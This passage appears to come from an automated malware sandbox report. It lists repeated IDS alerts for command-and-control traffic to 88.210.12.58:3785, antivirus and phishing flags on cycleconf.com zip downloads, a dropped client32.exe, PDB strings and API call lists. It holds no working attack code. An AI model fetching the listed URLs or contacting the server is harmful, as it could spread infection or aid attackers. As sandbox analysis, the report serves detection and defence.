2024-12-10T08:59:11.282944+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.382028+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.483104+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.627697+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.627697+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.945976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.945976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.148057+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.349006+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.450033+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.551058+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.651042+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.751022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.853906+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.958794+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.059116+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.158795+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.258878+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.358722+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.456994+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.558004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.658074+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.758857+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.859013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.959029+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.059027+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.160282+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.262059+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.461999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.461999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.968793+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.167008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.268729+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.368026+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.469090+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.569090+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.669758+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.772729+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.870903+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.971019+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.072007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.173057+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.273070+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.373100+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.474027+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.575010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.676005+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.776012+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.876010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.980735+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.078013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.182741+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.279030+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.379991+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.480223+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.580016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.682745+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.781008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.882741+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.982998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.084120+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.184131+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.285021+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.386082+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.486049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.586008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.687010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.788005+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.888075+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.990922+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.089016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.191771+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.290016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.392729+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.491321+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.595643+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.695046+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.796356+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.897666+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.997049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.098184+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.199108+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.299116+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.400034+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.500049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.600031+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.701107+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.801013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.903173+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.002008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.102811+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.202807+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.303037+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.404026+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.506787+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.605256+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.708741+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.808733+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.907012+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.008054+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.108003+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.208063+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.309055+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.410055+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.511002+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.611061+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.712003+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.812007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.912742+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.014815+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.116746+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.213022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.316740+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.416747+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.514104+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.615026+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.715014+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.816734+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.916013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.017034+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.117017+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.218054+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.319061+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.420058+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.521079+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.621055+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.722050+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.822015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.924751+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.024863+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.124745+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.223018+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.324019+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.424014+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.524001+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.625077+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.728747+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.828748+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.927056+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.028056+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.128049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.229045+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.330020+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.430059+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.531056+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.632097+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.732032+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.832022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.934875+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:27.036758+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lFxGd66yDa.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://cycleconf.com/dwnld/2nd2_4.zip	Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_1.zip	Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_2.zip	Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_3.zip	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: lFxGd66yDa.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		4_2_110AC600
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AC600

Source: lFxGd66yDa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

File opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.6:49707 version: TLS 1.2

Source: lFxGd66yDa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4576435931.000000006C6F2000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.2270148360.000000006C6F2000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000004.00000002.4575938208.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000006.00000002.2269867931.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: msauserext.pdbGCTL source: msauserext.dll.0.dr
Source:	Binary string: mscpxl32.pdb source: lFxGd66yDa.exe, 00000000.00000003.2192434264.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192581404.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mscpxl32.dLL.0.dr
Source:	Binary string: mscpxl32.pdbGCTL source: lFxGd66yDa.exe, 00000000.00000003.2192434264.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192581404.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mscpxl32.dLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: mscat32.pdbGCTL source: mscat32.dll.0.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217417326.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, msvcp140_1.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.0.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: msauserext.pdb source: msauserext.dll.0.dr
Source:	Binary string: client32_ctr.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.4576301336.000000006C6D5000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.2270046103.000000006C6D5000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.0.dr
Source:	Binary string: mscat32.pdb source: mscat32.dll.0.dr
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217525712.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, msvcp140_codecvt_ids.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_0019F905 FindFirstFileExW,	0_2_0019F905
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D1B3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_11069760
